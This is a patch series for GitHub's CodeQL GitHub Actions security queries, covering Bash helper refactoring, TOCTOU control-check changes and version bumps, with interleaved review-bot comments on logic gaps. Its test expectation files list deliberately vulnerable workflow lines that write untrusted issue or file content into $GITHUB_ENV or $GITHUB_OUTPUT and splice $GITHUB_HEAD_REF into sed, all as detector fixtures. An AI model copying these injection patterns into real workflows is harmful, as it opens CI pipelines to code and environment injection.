value) and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubEnv(key, value) ) or // A file is read and its content is assigned to an output // - run: echo "foo=$(> "$GITHUB_ENV" - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and - outputsPartialFileContent(value) + run.getAWriteToGitHubEnv(key, value) and + Bash::outputsPartialFileContent(run, value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and artifact.getAFollowingStep() = run and 
diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 923d950631d3..a80032de3209 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -27,19 +27,19 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { ( // e.g. // cat test-results/.env >> $GITHUB_PATH - fileToGitHubPath(run, _) + Bash::fileToGitHubPath(run, _) or exists(string value | - writeToGitHubPath(run, value) and + run.getAWriteToGitHubPath(value) and ( - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_PATH exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 6f325ca4c939..65c6938f0a43 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
@@ -29,22 +29,21 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { ( // e.g. // cat test-results/.env >> $GITHUB_ENV - fileToGitHubEnv(run, _) + Bash::fileToGitHubEnv(run, _) or - exists(string content, string value | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and + exists(string value | + run.getAWriteToGitHubEnv(_, value) and ( // e.g. // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_ENV exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4a488f945b97..8541286f6e19 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
@@ -38,27 +38,25 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( // e.g. // cat test-results/.vars >> $GITHUB_OUTPUT - fileToGitHubOutput(run, _) + Bash::fileToGitHubOutput(run, _) or - exists(string content, string key, string value | - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and + exists(string key, string value | + run.getAWriteToGitHubOutput(key, value) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and + exists(string key2 | + run.getAWriteToGitHubOutput(key2, _) and not key2 = key ) and ( - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_OUTPUT exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or @@ -87,9 +85,8 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and + exists(string key2 | + run.getAWriteToGitHubOutput(key2, _) and not key2 = key ) and exists(run.getInScopeEnvVarExpr(var_name)) and 
@@ -118,7 +115,7 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { WorkflowCommandClobberingFromEnvVarSink() { exists(Run run, string output_line, string clobbering_line, string var_name | run.getScript().splitAt("\n") = output_line and - singleLineWorkflowCmd(output_line, "set-output", _, _) and + Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and run.getScript().splitAt("\n") = clobbering_line and clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and exists(run.getInScopeEnvVarExpr(var_name)) and 
@@ -132,19 +129,16 @@ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { exists(Run run, string output_line, string clobbering_line | run.getScriptScalar() = this.asExpr() and run.getScript().splitAt("\n") = output_line and - singleLineWorkflowCmd(output_line, "set-output", _, _) and + Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and run.getScript().splitAt("\n") = clobbering_line and ( // A file is read and its content is assigned to an env var that gets printed to stdout // - run: | // foo=$(> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=SUBCOMMAND | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64) | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | base64 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | cat status.output.json | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$(cat status.output.json)" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "SUBCOMMAND" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | 
@@ -132,7 +136,7 @@ | .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | @@ -159,7 +163,7 @@ | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo SUBCOMMAND | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo bar | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | 
@@ -185,15 +189,11 @@ | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "bar" | | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" | | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | npm i | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo SUBCOMMAND bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | npm i | | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | " config.json | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = .* | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\" | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 100eddb14002..a87ec0a341c3 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected 
@@ -1,5 +1,3 @@ -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 80ebd80b4c2b..5880e06da7fd 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -81,7 +81,7 @@ query predicate writeToGitHubEnv1(string content) { //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", ] and //linesFileWrite(t, _, "$GITHUB_ENV", content, _) - blockFileWrite(t, _, "$GITHUB_ENV", content, _) + Bash::blockFileWrite(t, _, "$GITHUB_ENV", content, _) //extractFileWrite(t, "GITHUB_ENV", content) ) } @@ -113,8 +113,8 @@ query predicate writeToGitHubEnv(string key, string value, string content) { "echo VAR15=$(> $GITHUB_ENV", "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", ] and - extractFileWrite(t, "GITHUB_ENV", content) and - extractVariableAndValue(content, key, value) + Bash::extractFileWrite(t, "GITHUB_ENV", content) and + Bash::extractVariableAndValue(content, key, value) ) } @@ -132,8 +132,8 @@ query predicate writeToGitHubOutput(string key, string value, string content) { "echo VAR8=$(> ${GITHUB_OUTPUT}", "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", ] and - extractFileWrite(t, "GITHUB_OUTPUT", content) and - extractVariableAndValue(content, key, value) + Bash::extractFileWrite(t, "GITHUB_OUTPUT", content) and + Bash::extractVariableAndValue(content, key, value) ) } 
@@ -150,6 +150,6 @@ query predicate isBashParameterExpansion(string parameter, string operator, stri "${parameter21%%pattern}", "${parameter22/pattern/string}", "${parameter23//pattern/string}", ] and - isBashParameterExpansion(test, parameter, operator, params) + Bash::isBashParameterExpansion(test, parameter, operator, params) ) } From 5494f7f09953e8fa7f277528d6ac62db3019b3e0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:16:37 +0200 Subject: [PATCH 565/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9637b9931187..49cb71df1b29 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.62 +version: 0.1.63 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6548292a6772..864c4949a124 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.62 +version: 0.1.63 groups: [actions, queries] suites: codeql-suites extractor: javascript From 350b354fb3f9dc179f0c8bed0efb7d527cef5eaa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:17:45 +0200 Subject: [PATCH 566/707] remmove leftover comments --- ql/lib/codeql/actions/Helper.qll | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 8391463fd202..688d62acbe17 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -202,10 +202,8 @@ module Bash { "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and content = trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + - // "$(" + - trimQuotes(script.regexpCapture(regexp, 6)) + - // ")\n" + - "\n" + trimQuotes(script.regexpCapture(regexp, 4)) and + trimQuotes(script.regexpCapture(regexp, 6)) + "\n" + + trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" From 0c9b808fdf91d0b06014a2abbaebf0199f836553 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:41:18 +0200 Subject: [PATCH 567/707] Make Argument Injection queries experimental --- ql/src/Security/CWE-088/ArgumentInjectionCritical.ql | 1 + ql/src/Security/CWE-088/ArgumentInjectionMedium.ql | 1 + 2 files changed, 2 insertions(+) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 2626de31935a..5962132d72e7 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -8,6 +8,7 @@ * @id actions/argument-injection/critical * @tags actions * security + * experimental * external/cwe/cwe-088 */ diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql index fa5b750fd892..37acbc051229 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql @@ -8,6 +8,7 @@ * @id actions/argument-injection/medium * @tags actions * security + * experimental * external/cwe/cwe-088 */ From a3cf8766ffe7d42e8ac77cc22ad3e1f6f404a5b3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:42:23 +0200 Subject: [PATCH 568/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 49cb71df1b29..0be2657c99e5 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.63
+version: 0.1.64
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 864c4949a124..ebdf6b364b22 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.63
+version: 0.1.64
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 860eda9c041162b5031c51b2f8a91c652b4fe11f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 4 Oct 2024 18:04:13 +0200 Subject: [PATCH 569/707] Improve control checks to better account for toctou issues --- .../codeql/actions/security/ControlChecks.qll | 64 +++-- .../UntrustedCheckoutTOCTOUCritical.ql | 12 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 11 +- .../CWE-829/UntrustedCheckoutCritical.ql | 18 +- .../{deployment.yml => deployment1.yml} | 0 .../CWE-367/.github/workflows/deployment2.yml | 31 ++ .../CWE-367/.github/workflows/test0.yml | 68 +++++ .../CWE-367/.github/workflows/test1.yml | 96 +++++++ .../CWE-367/.github/workflows/test2.yml | 227 +++++++++++++++ .../CWE-367/.github/workflows/test3.yml | 271 ++++++++++++++++++ .../CWE-367/.github/workflows/test4.yml | 89 ++++++ .../CWE-367/.github/workflows/test5.yml | 209 ++++++++++++++ .../CWE-367/.github/workflows/test6.yml | 253 ++++++++++++++++ .../UntrustedCheckoutTOCTOUCritical.expected | 105 ++++++- .../UntrustedCheckoutTOCTOUHigh.expected | 2 + .../UntrustedCheckoutCritical.expected | 3 - 16 files changed, 1399 insertions(+), 60 deletions(-) rename ql/test/query-tests/Security/CWE-367/.github/workflows/{deployment.yml => deployment1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml 
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 801ccb6e9868..86de44c3b5ca 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -1,30 +1,44 @@ import actions -string any_relevant_category() { +string any_category() { result = [ "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection", "command-injection", "argument-injection", "code-injection", "cache-poisoning", - "untrusted-checkout-toctou", "artifact-poisoning" + "untrusted-checkout-toctou", "artifact-poisoning", "artifact-poisoning-toctou" ] } -string any_non_toctou_category() { - result = any_relevant_category() and not result = "untrusted-checkout-toctou" +string non_toctou_category() { + result = any_category() and not result = "untrusted-checkout-toctou" } -string any_relevant_event() { +string toctou_category() { result = ["untrusted-checkout-toctou", "artifact-poisoning-toctou"] } + +string any_event() { result = actor_not_attacker_event() or result = actor_is_attacker_event() } + +string actor_is_attacker_event() { result = [ + // actor and attacker have to be the same "pull_request_target", - "issue_comment", - "pull_request_comment", "workflow_run", + "discussion_comment", + "discussion", "issues", "fork", - "watch", - "discussion_comment", - "discussion" + "watch" + ] +} + +string actor_not_attacker_event() { + result = + [ + // actor and attacker can be different + // actor may be a collaborator, but the attacker is may be the author of the PR that gets commented + // therefore it may be vulnerable to TOCTOU races where the actor reviews one thing and the attacker changes it + "issue_comment", + "pull_request_comment", ] } 
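Review bot: `non_toctou_category()` still excludes only `"untrusted-checkout-toctou"`, while the new `toctou_category()` also lists `"artifact-poisoning-toctou"`, the value this hunk adds to `any_category()`; as written, `"artifact-poisoning-toctou"` is returned by both predicates, so every override that uses `non_toctou_category()` on `actor_not_attacker_event()` (the AssociationCheck, ActorCheck, PermissionCheck, LabelCheck and EnvironmentCheck hunks below) will presumably count as protecting against an artifact-poisoning race on comment-triggered events. Defining it as `result = any_category() and not result = toctou_category()` keeps the two sets disjoint and means a future TOCTOU category only has to be added in one place. The comment on `actor_not_attacker_event()` also reads `the attacker is may be the author`; dropping the stray `is` would help.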
@@ -81,7 +95,9 @@ abstract class AssociationCheck extends ControlCheck { // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -90,7 +106,9 @@ abstract class ActorCheck extends ControlCheck { // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -106,8 +124,9 @@ abstract class PermissionCheck extends ControlCheck { // - they are effective against pull requests/workflow_run since they can control who can make changes // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run", "issue_comment"] and - category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } 
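Review bot: The comment block kept above each of these three `protectsCategoryAndEvent` overrides still says the check is `not effective against issue_comment since the author of the comment may not be the same as the author of the PR`, but the added `event = actor_not_attacker_event() and category = non_toctou_category()` branch now makes AssociationCheck, ActorCheck and PermissionCheck protect every non-TOCTOU category on `issue_comment` and `pull_request_comment`, so the comment and the code disagree. A replacement such as `// - on comment-triggered events they only cover the non-TOCTOU categories: the commenter may not be the PR author, and the PR may change after the comment` would match the new behaviour. The same five-line body is also repeated verbatim here and in the LabelCheck and EnvironmentCheck hunks that follow; one shared predicate in this file that the five overrides call (or a default on `ControlCheck` that only the repository checks override) would stop the event/category lists drifting apart. The class bodies start outside this hunk.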
@@ -115,7 +134,9 @@ abstract class LabelCheck extends ControlCheck { // checks if the issue/pull_request is labeled, which implies that it could have been approved // - they dont protect against mutation attacks override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -123,14 +144,16 @@ class EnvironmentCheck extends ControlCheck instanceof Environment { // Environment checks are not effective against any mutable attacks // they do actually protect against untrusted code execution (sha) override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } abstract class CommentVsHeadDateCheck extends ControlCheck { override predicate protectsCategoryAndEvent(string category, string event) { // by itself, this check is not effective against any attacks - none() + event = actor_not_attacker_event() and category = toctou_category() } } @@ -187,7 +210,7 @@ class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If { } override predicate protectsCategoryAndEvent(string category, string event) { - event = "pull_request_target" and category = any_relevant_category() + event = "pull_request_target" and category = any_category() } } @@ -205,7 +228,7 @@ class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If { } override predicate protectsCategoryAndEvent(string category, string event) { - event = "workflow_run" and category = any_relevant_category() + event = "workflow_run" and category = any_category() } } 
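Review bot: LabelCheck and EnvironmentCheck now grant `category = any_category()` on `actor_is_attacker_event()` (which includes `pull_request_target` and `workflow_run`), and that set covers the `*-toctou` categories, yet the comments kept above them still say `they dont protect against mutation attacks` and `Environment checks are not effective against any mutable attacks`; before this change both were limited to `any_non_toctou_category()` on exactly those events. A label or environment gate does not expire when the PR author pushes another commit, so — assuming `protects` is built on `protectsCategoryAndEvent` — the UntrustedCheckoutTOCTOU queries in this commit will now treat a labeled `pull_request_target` checkout as fully protected. If that is intended because the TOCTOU categories are meant to apply only to comment-triggered events, the two comments should say so; otherwise the first branch of these two overrides should read `event = actor_is_attacker_event() and category = non_toctou_category()`. The `CommentVsHeadDateCheck` change in the same hunk looks consistent with the new categories, but its comment `by itself, this check is not effective against any attacks` is now stale as well.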
@@ -250,6 +273,9 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { not exists(this.getArgument("permission-level")) or this.getArgument("permission-level") = ["write", "admin"] ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%") } } diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 11897c464bf9..16fb2606af79 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -18,18 +18,14 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from - LocalJob job, MutableRefCheckoutStep checkout, PoisonableStep step, ControlCheck check, - Event event +from MutableRefCheckoutStep checkout, PoisonableStep step, Event event where - job.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, event, "untrusted-checkout") and - not check.protects(checkout, event, "untrusted-checkout-toctou") + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select step, checkout, step, - "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", - check, check.toString() + "Insufficient protection against execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 5956b52ccbe4..d4ed49e497aa 100644 
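Review bot: The new `actions/github-script` branch classifies a step as a permission check whenever a line of its `script` contains the substring `getCollaboratorPermissionLevel`, without confirming that the returned permission is compared against anything or that a failing result stops the job (a `core.setFailed`, a throw, or an output consumed by a later `if:`), so a script that merely logs the level would be enough to suppress the untrusted-checkout alerts that depend on this check. Since the other branches of this predicate match a specific callee plus its arguments, this one deserves a comment stating the heuristic, e.g. `// heuristic: assumes a script that queries getCollaboratorPermissionLevel also acts on the result; not verified`. `splitAt("\n")` is likely unnecessary for a `%...%` match and could be dropped. The predicate's head and the rest of `PermissionActionCheck` are outside this hunk.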
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,17 +16,14 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob job, MutableRefCheckoutStep checkout, ControlCheck check, Event event +from MutableRefCheckoutStep checkout, Event event where - job.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and - event = job.getATriggerEvent() and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, event, "untrusted-checkout") and - not check.protects(checkout, event, "untrusted-checkout-toctou") + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select checkout, - "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", - check, check.toString() + "Insufficient protection against execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index f9f951917955..37628a29489a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
